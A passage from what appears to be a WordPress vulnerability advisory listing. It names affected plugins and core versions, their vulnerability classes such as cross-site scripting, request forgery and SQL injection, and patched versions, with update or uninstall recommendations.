Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Core: WordPress

Vulnerability: Forced Password Reset
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: TPG Redirect

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WP Discord Invite

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Prismatic

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Duplicate Theme

Vulnerability: Cross-Site Request Forgery via themeDuplicationAction
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin)

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 7.12.1
Recommended Action: Update to version 7.12.1, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Order Information Disclosure
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible

Vulnerability: Missing Authorization
Patched Version: 6.6.1
Recommended Action: Update to version 6.6.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Scripting
Patched Version: 6.2.2
Recommended Action: Update to version 6.2.2, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Products Filter for WooCommerce <= 1.2.6.2
Patched Version: 1.2.6.3
Recommended Action: Update to version 1.2.6.3, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Login Page Disclosure via Referer Header
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Site Reviews

Vulnerability: Missing Authorization
Patched Version: 6.6.0
Recommended Action: Update to version 6.6.0, or a newer patched version

Plugin: Quick Contact Form

Vulnerability: Cross-Site Scripting
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: Postie

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.41
Recommended Action: Update to version 1.9.41, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘ajax_deactivate’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Tabs Responsive – With WooCommerce Product Tabs Extension

Vulnerability: Editor+ Stored Cross-Site Scripting
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Authenticated (Contributor+) PHAR Deserialization
Patched Version: 3.7.10
Recommended Action: Update to version 3.7.10, or a newer patched version

Plugin: Companion Auto Update

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.3.6
Recommended Action: Update to version 3.3.6, or a newer patched version

Plugin: CM Ad Changer – Ad Manager and Ad Server

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: WP Post Columns

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Theme Blvd Responsive Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: My YouTube Channel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.23.0
Recommended Action: Update to version 3.23.0, or a newer patched version

Plugin: WP Performance Score Booster – Optimize Speed, Enable Cache & Page Preload

Vulnerability: Settings Change via Cross-Site Request Forgery
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 3.4.24.2
Recommended Action: Update to version 3.4.24.2, or a newer patched version

Plugin: my-category-order

Vulnerability: SQL Injection
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: DukaPress

Vulnerability: Blind SQL Injection
Patched Version: 2.5.9.1
Recommended Action: Update to version 2.5.9.1, or a newer patched version

Plugin: Yoo Slider – Image Slider & Video Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: PowerPack Lite for Beaver Builder

Vulnerability: No subtitle
Patched Version: 1.2.9.3
Recommended Action: Update to version 1.2.9.3, or a newer patched version

Plugin: Wishlist and Compare for WooCommerce

Vulnerability: Authorization Bypass
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Responsive Lightbox & Gallery

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: WS Form LITE – Drag & Drop Contact Form Builder for WordPress

Vulnerability: CAPTCHA Bypass
Patched Version: 1.9.118
Recommended Action: Update to version 1.9.118, or a newer patched version

Plugin: Keyword Strategy Internal Links

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.20.94
Recommended Action: Update to version 4.20.94, or a newer patched version

Plugin: Variation Swatches for WooCommerce

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Responsive Tabs

Vulnerability: Authenticated (Contributor+) Content Injection
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block Attribute
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Hummingbird Performance – Cache & Page Speed Optimization for Core Web Vitals | Critical CSS | Minify CSS | Defer CSS Javascript | CDN

Vulnerability: Unauthenticated Path Traversal
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Login or Logout Menu Item

Vulnerability: Unauthenticated Settings Update
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.02
Recommended Action: Update to version 1.3.02, or a newer patched version

Plugin: TinyMCE Color Picker

Vulnerability: Missing Authorization
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: RumbleTalk Live Group Chat – HTML5

Vulnerability: Missing Authorization via handleRequest
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Authenticated (Subscriber+) Arbitrary Plugin Installation and Activation
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: Telefication

Vulnerability: Open Relay and Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShiftThis

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Breezing Forms

Vulnerability: SQL Injection
Patched Version: 1.2.7.31
Recommended Action: Update to version 1.2.7.31, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: Authenticated SQL Injection
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Backup Scheduler

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Category Template

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPML

Vulnerability: Arbitrary Deletion of Content
Patched Version: 3.1.9.1
Recommended Action: Update to version 3.1.9.1, or a newer patched version

Plugin: Click to top

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Plugmatter Optin Feature Box

Vulnerability: SQL Injection
Patched Version: 2.0.14
Recommended Action: Update to version 2.0.14, or a newer patched version

Plugin: Limit Login Attempts (Spam Protection)

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Microsoft Clarity

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.4
Recommended Action: Update to version 0.4, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: Sell Media

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: Contractor Contact Form Website to Workflow Tool

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Analytics for WP

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Form – Contact Form

Vulnerability: Administrator+ Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Documentor – Create Product Documentation

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WP Like Button

Vulnerability: Missing Authorization via crublabFBLBAjax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Student Results

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection via ‘event_count’
Patched Version: 7.8.2
Recommended Action: Update to version 7.8.2, or a newer patched version

Core: WordPress

Vulnerability: Remote File Inclusion
Patched Version: 0.71
Recommended Action: Update to version 0.71, or a newer patched version

Plugin: WooCommerce EnvioPack

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 20160215
Recommended Action: Update to version 20160215, or a newer patched version

Plugin: amr shortcode any widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShareThis Dashboard for Google Analytics

Vulnerability: Reflected Cross-Site Scripting via ga_action parameter
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Woocommerce Products Price Bulk Edit

Vulnerability: Cross-Site Scripting via show_products_page_limit parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Service Area Postcode Checker

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1.0.5
Recommended Action: Update to version 3.1.0.5, or a newer patched version

Plugin: FeedWordPress

Vulnerability: SQL Injection
Patched Version: 2015.0514
Recommended Action: Update to version 2015.0514, or a newer patched version

Plugin: Leaflet Maps Marker Pro

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: underConstruction

Vulnerability: Cross-Site Request Forgery to Construction Mode Disabled
Patched Version: 1.20
Recommended Action: Update to version 1.20, or a newer patched version

Plugin: Simple File List

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.12
Recommended Action: Update to version 4.4.12, or a newer patched version

Plugin: NitroPack – Caching & Speed Optimization for Core Web Vitals, Defer CSS & JS, Lazy load Images and CDN

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.3
Recommended Action: Update to version 1.10.3, or a newer patched version

Plugin: Psychological tests & quizzes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tweet Wheel

Vulnerability: Missing Authorization Checks
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Security Audit

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: File Manager

Vulnerability: Arbitrary File Upload/Remote Code Execution
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: WP-Members Membership Plugin

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: Fontsy

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Open Redirect
Patched Version: 1.9.30
Recommended Action: Update to version 1.9.30, or a newer patched version

Plugin: CDN Vote

Vulnerability: SQL Injection
Patched Version: 0.4.2
Recommended Action: Update to version 0.4.2, or a newer patched version

Plugin: Keyword Rank Tracker

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WDS Multisite Aggregate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 4.3.45
Recommended Action: Update to version 4.3.45, or a newer patched version

Plugin: RD Station

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 5.2.1
Recommended Action: Update to version 5.2.1, or a newer patched version

Plugin: mgl-instagram-gallery

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Free WordPress Lead Generation Opt in, Free Popups, Generated Lead Email Popup, Exit-Intent Popup – NotifyVisitors

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Elegant Custom Fonts

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Animate It!

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: LionScripts: IP Blocker Lite

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 10.5
Recommended Action: Update to version 10.5, or a newer patched version

Plugin: Online Booking & Scheduling Calendar for WordPress by vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.21.1
Recommended Action: Update to version 4.21.1, or a newer patched version

Plugin: Tag Miner (Automatic Tag Extraction)

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Legal Pages – Privacy Policy, Terms & Conditions, GDPR, CCPA, and Cookie Notice Generator

Vulnerability: Missing Authorization
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Typing Effect

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Conditional Payments for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Website Optimization – Plerdy

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Authenticated (Author+) Remote Code Execution
Patched Version: 7.9.9
Recommended Action: Update to version 7.9.9, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.7.9
Recommended Action: Update to version 4.7.9, or a newer patched version

Plugin: More from Google

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 10WebAnalytics

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Open Redirect
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Responsive Logo Slideshow

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Ultimate Reviews

Vulnerability: PHP Object Injection
Patched Version: 2.1.33
Recommended Action: Update to version 2.1.33, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Login Page Disclosure via ‘action=confirmaction’
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Contextual Adminbar Color

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Open Redirect
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Advanced Database Cleaner

Vulnerability: SQL Injection
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Reflected Cross-Site Scripting via ays_gpg_settings_tab
Patched Version: 5.1.4
Recommended Action: Update to version 5.1.4, or a newer patched version

Plugin: SVGator – Add Animated SVG Easily

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Freshmail for WordPress

Vulnerability: SQL Injection
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: No Follow All External Links

Vulnerability: 2.3.0
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ready! Google Maps

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Link Library

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8.11
Recommended Action: Update to version 5.8.11, or a newer patched version

Plugin: Decorator – WooCommerce Email Customizer

Vulnerability: WooCommerce Email Customizer <= 1.2.7
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Floating Tweets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Meta Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Engine (Media Organizer & Lightroom)

Vulnerability: Authenticated (Author+) Insecure Direct Object Reference in ajax_generate_auth_token
Patched Version: 6.2.6
Recommended Action: Update to version 6.2.6, or a newer patched version

Plugin: WP Limit Login Attempts

Vulnerability: SQL Injection
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: BP Group Documents

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Grid Gallery – Photo Image Grid Gallery

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Shapely Companion

Vulnerability: Unprotected AJAX Action to Content Import
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: Cross-Site Request Forgery to Post Updates
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: 10Web Social Post Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Search Everything

Vulnerability: SQL Injection
Patched Version: 8.1.7
Recommended Action: Update to version 8.1.7, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.11
Recommended Action: Update to version 2.9.11, or a newer patched version

Plugin: Locatoraid Store Locator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.9.15
Recommended Action: Update to version 3.9.15, or a newer patched version

Plugin: EventON

Vulnerability: Missing Authorization to Event Access
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: zeList

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MF Gig Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.0.14
Recommended Action: Update to version 1.7.0.14, or a newer patched version

Plugin: BuddyPress & BuddyBoss Member Profile Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.22
Recommended Action: Update to version 1.4.22, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 7.0.07
Recommended Action: Update to version 7.0.07, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.19
Recommended Action: Update to version 1.9.19, or a newer patched version

Plugin: WooCommerce Subscription

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Missing Authorization
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Store Toolkit – WooCommerce Extensions, Quick Enhancements & Handy Tools

Vulnerability: Privilege Escalation
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Counter Box: Add Engaging Countdowns, Timers & Counters to Your WordPress Site

Vulnerability: Authenticated Local File Inclusion
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Alphabetic Pagination

Vulnerability: Missing Authorization to Unauthenticated Arbitrary Options Update
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Blazeo

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WP Repost

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: Parcel Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.12
Recommended Action: Update to version 1.6.12, or a newer patched version

Plugin: Contact form 7 Custom validation

Vulnerability: Unauthenticated SQL Injection via ‘post’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery on ajax_move_object
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: video carousel slider with lightbox

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Simple Slug Translate

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Attendance Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.5.7
Recommended Action: Update to version 0.5.7, or a newer patched version

Plugin: Bulk edit image alt tag, caption & description – WordPress Media Library Helper by Codexin

Vulnerability: Cross-Site Request Forgery via rate_the_plugin_action
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Real3D Flipbook

Vulnerability: Directory Traversal via Uploads
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Student Result or Employee Database

Vulnerability: Missing Authorization
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: WP Simple Spreadsheet Fetcher for Google

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.3.7
Recommended Action: Update to version 0.3.7, or a newer patched version

Plugin: Simple Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: TI WooCommerce Wishlist

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.40.1
Recommended Action: Update to version 1.40.1, or a newer patched version

Plugin: Twitter Bootstrap Slider

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
